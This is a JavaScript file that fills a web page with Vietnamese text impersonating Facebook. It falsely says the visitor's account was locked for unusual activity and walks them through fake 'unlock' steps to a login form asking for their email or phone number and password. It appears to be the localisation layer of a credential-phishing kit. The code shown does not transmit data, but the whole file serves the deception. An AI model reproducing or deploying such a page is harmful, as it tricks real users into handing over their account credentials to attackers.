var mainHeader = document.querySelector(".home-main-header .home-heading");
var mainParagraph = document.querySelector(".home-mainparagrph .home-text");
var lockedHeader = document.querySelector(".home-lockedheader .home-text1");
var lockedParagraph = document.querySelector(".home-lockedinfobox .home-container6 .home-text5");
var footerParagraph = document.querySelector(".home-main-card .home-container7 .home-text6");
var getStarted = document.querySelector(".home-main-card .home-link");
var nextHeader = document.querySelector(".home-next-card .home-unlock-header .home-text");
var fristLineHeader = document.querySelector(".home-f-line .home-text03");
var fristLineParagraph = document.querySelector(".home-f-line .home-text05 span"); 
var secoundLineHeader = document.querySelector(".home-s-line .home-text09"); 
var thirdLineHeader = document.querySelector(".home-t-line .home-text12"); 
var nextButton = document.querySelector(".home-next-buttons .home-button1");
var backButton = document.querySelector(".home-next-buttons .home-button");
var logHeading = document.querySelector(".home-log-card .dlog .home-heading");
var logAlert = document.querySelector(".home-log-card .home-alert");
var logAlert2 = document.getElementById("alert");
var userInput = document.querySelector(".home-mail");
var passInput = document.querySelector(".home-pass");
var logButton = document.querySelector(".home-submit"); 
var or = document.querySelector(".home-or");
var createButton = document.querySelector(".home-creat-new");


mainHeader.innerHTML ="Tài khoản của bạn đã bị khóa";
mainParagraph.innerHTML ="Chúng tôi đã thấy hoạt động bất thường trên tài khoản của bạn. Điều này có thể có nghĩa là ai đó đã sử dụng tài khoản của bạn mà bạn không biết.";
lockedHeader.innerHTML ="Tài khoản bị khóa ngày 10 tháng 11 năm 2021";
lockedParagraph.innerHTML ="Để bảo vệ bạn, hồ sơ của bạn không hiển thị với những người trên Facebook và bạn không thể sử dụng tài khoản của mình.";
footerParagraph.innerHTML ="Chúng tôi sẽ hướng dẫn bạn một số bước để mở khóa tài khoản của bạn.";
getStarted.innerHTML ="Bắt đầu";
nextHeader.innerHTML ="Cách mở khóa tài khoản của bạn";
fristLineHeader.innerHTML ="Xác nhận rằng đây là tài khoản của bạn";
fristLineParagraph.innerHTML ="Vì ai đó có thể đã có quyền truy cập, chúng tôi cần xác nhận rằng bạn là chủ sở hữu của tài khoản này trước khi chúng tôi tiến hành thêm bất kỳ bước nào.";
secoundLineHeader.innerHTML ="Bảo mật thông tin đăng nhập của bạn";
thirdLineHeader.innerHTML ="Tài khoản của bạn sẽ được mở khóa";
nextButton.innerHTML ="Kế tiếp";
backButton.innerHTML ="Mặt sau";
logHeading.innerHTML ="Đăng nhập vào Facebook";
logAlert.innerHTML ="Bạn cần phải đăng nhập đầu tiên";
logAlert2.innerHTML ="Bạn cần phải đăng nhập đầu tiên";
userInput.setAttribute("placeholder" , "Địa chỉ email hoặc số điện thoại");
passInput.setAttribute("placeholder" , "Mật khẩu");
logButton.innerHTML ="Đăng nhập";
or.innerHTML ="hoặc";
createButton.innerHTML ="Tạo tài khoản mới";
